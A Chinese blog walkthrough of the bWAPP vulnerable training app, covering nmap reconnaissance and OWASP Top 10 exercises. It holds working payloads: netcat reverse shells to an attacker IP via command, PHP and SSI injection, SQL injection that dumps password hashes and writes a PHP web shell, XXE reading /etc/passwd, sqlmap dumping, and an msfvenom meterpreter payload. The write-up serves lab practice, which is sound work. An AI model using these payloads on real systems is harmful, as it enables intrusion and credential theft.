bWAPP练习

大家好，又见面了，我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

简介

虚拟机下载地址： https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

如果你想自己去部署环境：https://sourceforge.net/projects/bwapp/files/bee-box/

bWAPP包含有100多个漏洞，包括OWASP Top10安全风险，很爽的PHPweb靶机。

登录username:bee  password:bug    可设置漏洞级别来增加难度低->中->高。

想详细了解去查阅相关文档，让我们愉快的干掉小蜜蜂

0x001 侦查

在怎样也要侦查一下这个虚拟机吧，基本的流程，拿出Nmap扫它一下下

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           ProFTPD 1.3.1
22/tcp   open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 45:a4:66:ec:3a:ba:97:f8:3e:1a:ba:1c:24:68:22:e8 (DSA)
|_  2048 63:e7:c5:d1:8d:8a:94:02:36:6a:d7:d2:75:e9:8b:ce (RSA)
25/tcp   open  smtp          Postfix smtpd
|_smtp-commands: bee-box, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
80/tcp   open  http          Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp  open  ssl/https?
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp  open  netbios-ssn   Samba smbd 3.0.28a (workgroup: ITSECGAMES)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
666/tcp  open  doom?
| fingerprint-strings: 
|   GenericLines, beast2: 
|     *** bWAPP Movie Service ***
|_    Matching movies: 0
3306/tcp open  mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5901/tcp open  vnc           VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    VNC Authentication (2)
6001/tcp open  X11           (access denied)
8080/tcp open  http          nginx 1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: Site doesn't have a title (text/html).
8443/tcp open  ssl/https-alt nginx/1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| tls-nextprotoneg: 
|_  http/1.1
9080/tcp open  http          lighttpd 1.4.19
|_http-server-header: lighttpd/1.4.19
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=12/4%Time=5C06158B%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,400,"\*\*\*\x20bWAPP\x20Movie\x20Service\x20\*\*\*\nMatching\
SF:x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0")%r(beast2,400,"\*\*\*\x20bWAPP\x20Movie\x20Service
SF:\x20\*\*\*\nMatching\x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host:  bee-box; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -26d19h39m59s, deviation: 29m59s, median: -26d19h25m00s
|_nbstat: NetBIOS name: BEE-BOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: bee-box
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: bee-box
|_  System time: 2018-11-07T11:27:32+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

有了基本的了解，开始进行漏洞的练习

0x002 A1 注入

1.HTML Injection – Reflected (GET)  

查看表单是get还是post打开浏览器 F12 查看，查看源码页面搜First name:，为了方便回放数据，使用burpsuite

<form action="/bWAPP/htmli_get.php" method="GET">

HTML <a>标签的注入 <a href=http://www.baidu.com>点此领取奖励</a>

<a href=http://www.baidu.com>点此领取奖励</a> #low
<script>alert(document.cookie)</script> #js 窃取cookie 可以展开思路去扩展，条条马路通罗马

当设置中级别的时候注入不了，尝试对代码进行转码处理 ，高级别的还无法绕过，对php不太熟悉

<a href=http://www.baidu.com>点此领取奖励</a>
#进行转码
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E

2.HTML Injection – Reflected (POST)

<a href=http://www.baidu.com>点此领取奖励</a> #low

%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E #medium

high 作弊办法只有 改数据了。。。。非常无耻啊啊啊！！！

POST /bWAPP/htmli_post.php HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.104/bWAPP/htmli_post.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Cookie: PHPSESSID=f4fdf1cde23c464faf2f2d13c926dcf2; security_level=2 #改1 或 0
Connection: close
Upgrade-Insecure-Requests: 1

firstname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&lastname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&form=submit

3.HTML Injection – Reflected (URL)

#low 反射URL可以任意修改
GET /bWAPP/htmli_current_url.php#<script>alert(document.cookie)</script>  HTTP/1.1
Host: 192.168.1.104 #IP地址任意修改

4.HTML Injection – Stored (Blog)

<a href=http://www.baidu.com>点此领取奖励</a> #low 可写入任意的代码进行执行

#伪造登录
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.101 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

5.iFrame Injection

#low
ParamUrl=https://www.baidu.com&ParamWidth=1000&ParamHeight=1000 
ParamUrl=robots.txt" onload="alert(document.cookie)
"></iframe><script>alert(document.cookie);</script>

6.LDAP Connection Settings

#没有配置 需要自己配置下
sudo apt-get install slapd ldap-utils
sudo apt-get install phpLDAPadmin #安装web页面

clear=* #注入

7.Mail Header Injection (SMTP)

test@domain.com%0ACc:test@domain.com,%0ABcc:test@domain.com

8.OS Command Injection

#low
; whoami

www.nsa.gov && nc -vn  192.168.1.101 4444 -e /bin/bash  

#监听
nc -lvp 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 51213
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

#medium
www.nsa.gov | nc -vn  192.168.1.101 4444 -e /bin/bash

high 的时候很难绕过上工具，那么多事 直接搞它

commix --url="http://192.168.1.104/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=4a7c070b665d8d0db8ce2b02941a6a0c" --data=target="192.168.1.101&form=submit"

9.OS Command Injection – Blind

#low
127.0.0.1 && nc -vn  192.168.1.101 4444 -e /bin/bash
#high  直接用commix 

10.PHP Code Injection

#low
phpi.php?message=test;phpinfo()
message=test;system('nc -vn  192.168.1.101 4444 -e /bin/bash')
#还可以执行wget http：//去下载木马 直接getshell 这种方法比瑞士军刀和反弹shell的隐藏性更好

11.Server-Side Includes (SSI) Injection

#low
<!--#exec cmd="nc 192.168.1.101 4444 -e /bin/bash" -->

#接收
nc -nlvp 4444

12.SQL Injection (GET/Search)

#low
sqli_1.php?title='+'&action=search
Iron Man' or 1=1 #
sqli_1.php?title=Iron+Man'+order+by+7+--+-&action=search
Iron Man' union select 1,2,3,4,5,6,7 #
iron' union select 1,user(),@@version,4,5,6,7 #

iron' union select 1,login,password,email,5,6,7 from users #

#可根据得到的密码进行激活成功教程
john --format:raw-sha1 /root/password.txt --show
?:bug

1 password hash cracked, 0 left


iron' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",3,4,5,6,7 into OUTFILE
'/var/www/bWAPP/tmp.php' #

13.SQL Injection (GET/Select)

movie=1 union select 1,2,3,4,5,6,7#&action=go
movie=67 union select 1,login,3,email,password,6,7 from users#&action=go

14.SQL Injection (POST/Search)

POST 提交参数一样的道理
AJAX 简单理解输入参数立马查询，和getpost注入一样的道理,
AJAX 分同步和异步

’ ‘
1' union select 1,2,3,4,5,6,7#

1' union select 1,login,3,email,password,6,7 from users#

15.SQL Injection – Stored (XML)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
  <login>&test;</login>
  <secret>login</secret>
</rest>

#burp中查看数据

SqlMap:脱库

sqlmap -u "http://192.168.1.104/bWAPP/sqli_1.php?title=1&action=search" --cookie="PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c; security_level=0" --dbs


available databases [4]:
[*] bWAPP
[*] drupageddon
[*] information_schema
[*] mysql

--current-db
[20:39:37] [INFO] fetching current database
[20:39:37] [INFO] retrieved: bWAPP
current database:    'bWAPP'

--current-user

[20:41:07] [INFO] fetching current user
[20:41:07] [INFO] retrieved: root@localhost
current user:    'root@localhost'

--users
database management system users [7]:
[*] ''@'bee-box'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'bee-box'
[*] 'root'@'localhost'


--passwords
cracked password 'bug' for user 'root' #直接停了不让它跑了

-D bWAPP --tables

[20:46:22] [INFO] fetching tables for database: 'bWAPP'
[20:46:23] [INFO] used SQL query returns 5 entries
[20:46:23] [INFO] retrieved: blog
[20:46:23] [INFO] retrieved: heroes
[20:46:23] [INFO] retrieved: movies
[20:46:23] [INFO] retrieved: users
[20:46:23] [INFO] retrieved: visitors
Database: bWAPP
[5 tables]
+----------+
| blog     |
| heroes   |
| movies   |
| users    |
| visitors |
+----------+

-D bWAPP -T users --columns
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| activated       | tinyint(1)   |
| activation_code | varchar(100) |
| admin           | tinyint(1)   |
| email           | varchar(100) |
| id              | int(10)      |
| login           | varchar(100) |
| password        | varchar(100) |
| reset_code      | varchar(100) |
| secret          | varchar(100) |
+-----------------+--------------+

-D bWAPP -T users -C password --dump

Database: bWAPP                                                                
Table: users
[2 entries]
+------------------------------------------------+
| password                                       |
+------------------------------------------------+
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
+------------------------------------------------+

--dump-all   #直接脱库

#本地激活成功教程密码太耗费时间了，可以放到服务器让它去跑。

0x003. A2 – Broken Auth. & Session Mgmt

1.Broken Auth. – CAPTCHA Bypassing

#使用burp Intruder 进行暴力激活成功教程

login=§test§&password=§123456§&captcha_user=zq9mso&form=submit

2.Broken Auth. – Forgotten Function

email=§12312414%40163.com§&action=forgot  #撞

3.Session Mgmt. – Administrative Portals

admin=1

4.Session Mgmt. – Cookies (Secure)

security_level=0; top_security=no<script>alert(1)</script>
Connection: close

5.Session Mgmt. – Session ID in URL

smgmt_sessionid_url.php?PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c

0x004. A3 – Cross-Site Scripting (XSS)

1.XSS – Reflected (GET) (POST)

<script>alert(document.cookie)</script>

2.XSS – Reflected (JSON)

<svg onload=prompt(0)>

3.XSS – Reflected (AJAX/JSON)

<img src=1 onerror=alert(1) />

4.XSS – Reflected (Back Button)

Referer: ';alert(1);'

5.XSS – Reflected (Custom Header)

bWAPP: <script>alert(1)</script>

6.XSS – Reflected (Eval)

date=alert(1)

7.XSS – Reflected (HREF)

Referer: <script>alert(1)</script>

8.XSS – Reflected (User-Agent)

User-Agent: <script>alert(1)</script>

0x005. A4 – Insecure Direct Object References

1.Insecure DOR (Change Secret)

secret=1&login=test&action=change

2.Insecure DOR (Reset Secret)

<reset><login>bee</login><secret>Any bugs?</secret></reset> #任意修改

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
  <login>&test;</login>
  <secret>login</secret>
</rest>

3.Insecure DOR (Order Tickets)

ticket_quantity=1&ticket_price=15&action=order #修改隐藏字段

#很多对价格没有进行模糊处理的BUG，即便是进行模糊处理，还可以复制小数进行测试

0x006.  A5 – Security Misconfiguration

1.Arbitrary File Access (Samba)

msf exploit(unix/misc/distcc_exec) > set rhost 192.168.1.104
rhost => 192.168.1.104
msf exploit(unix/misc/distcc_exec) > exploit 

[*] Started reverse TCP double handler on 192.168.1.101:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vbyqH8dKW4KUZQNS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vbyqH8dKW4KUZQNS\r\n"
[*] Matching...
[*] B is input...

id
uid=0(root) gid=0(root) groups=0(root)

使用enum4linux 进行枚举

#详细用法https://labs.portcullis.co.uk/tools/enum4linux/
enum4linux -S 192.168.1.104 #可以直接后面加IP进行详细的信息收集
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec  7 17:43:26 2018

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.104    |
 ===================================================== 
[+] Got domain/workgroup name: ITSECGAMES

 ====================================== 
|    Session Check on 192.168.1.104    |
 ====================================== 
[+] Server 192.168.1.104 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.104    |
 ============================================ 
Domain Name: ITSECGAMES
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================== 
|    Share Enumeration on 192.168.1.104    |
 ========================================== 

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
	opt             Disk      
	tmp             Disk      oh noes!
	print$          Disk      Printer Drivers
	Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
	Snagit_9:6      Printer   Snagit 9
	Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
	PDF             Printer   PDF
	Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
	HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
	Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
	Fax:2           Printer   Fax
	CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	ITSECGAMES           BEE-BOX
	WORKGROUP            FREE

[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$	[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/opt	Mapping: DENIED, Listing: N/A
//192.168.1.104/tmp	Mapping: OK, Listing: OK
//192.168.1.104/print$	Mapping: DENIED, Listing: N/A
//192.168.1.104/Xerox_Phaser_8500DN_PS:7	Mapping: DENIED, Listing: N/A
//192.168.1.104/Snagit_9:6	Mapping: DENIED, Listing: N/A
//192.168.1.104/Send_To_OneNote_2010:8	Mapping: DENIED, Listing: N/A
//192.168.1.104/PDF	Mapping: DENIED, Listing: N/A
//192.168.1.104/Microsoft_XPS_Document_Writer:1	Mapping: DENIED, Listing: N/A
//192.168.1.104/HP_Officejet_6500_E710a-f_(Network):5	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax_-_HP_Officejet_6500_E710a-f_(Network):4	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax:2	Mapping: DENIED, Listing: N/A
//192.168.1.104/CutePDF_Writer:3	Mapping: DENIED, Listing: N/A
enum4linux complete on Fri Dec  7 17:43:27 2018

smbclient -L 192.168.1.104

Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
	opt             Disk      
	tmp             Disk      oh noes!
	print$          Disk      Printer Drivers
	Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
	Snagit_9:6      Printer   Snagit 9
	Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
	PDF             Printer   PDF
	Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
	HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
	Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
	Fax:2           Printer   Fax
	CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	ITSECGAMES           BEE-BOX

上传文件

smbclient \\\\192.168.1.104\\tmp -c "put test"

0x007 

1.HTML5 Web Storage (Secret)

if(typeof(Storage) !== "undefined")
{

    localStorage.login = "bee";
    localStorage.secret = "1";
    alert(localStorage.login);
    alert(localStorage.secret);

}

2.Directory Traversal – Directories

?directory=../../../../var/www/

3.Directory Traversal – Files

?page=../../../../../etc/passwd

4.Host Header Attack (Cache Poisoning)

GET /bWAPP/hostheader_1.php HTTP/1.1
Host: www.baidu.com

5.Remote & Local File Inclusion (RFI/LFI)

?language=../../../../etc/passwd&action=go

?language=http://www.baidu.com

6.Restrict Device Access

Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMacOSX;en-us)AppleWebKit/532.9(KHTML,likeGecko) Version/4.0.5Mobile/8A293Safari/6531.22.7

7.XML External Entity Attacks (XXE)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY popped SYSTEM "file:///etc/passwd">
]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>

8.CSRF (Change Password)

?password_new=123&password_conf=123&action=change

9.PHP Eval Function

php_eval.php?eval=echo shell_exec("cat /etc/passwd");

10.Unrestricted File Upload

#low
weevely generate 123456 shell.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e php/base64 -f raw > shelltmp.php


#high 
Remote & Local File Inclusion (RFI/LFI) 
rlfi.php?language=images/shelltmp.php.png

总结：

只对此靶机进行了黑盒测试，没对源码分析。对php这门语言没有过多的学习，还是比较懒散。运用了kali linux工具进行渗透，工具的扫描会出现误报情况和诸多漏洞扫描不出来。工具只是辅助作用，还需要进行手工重复确认，对原理知识还需进一步学习练习。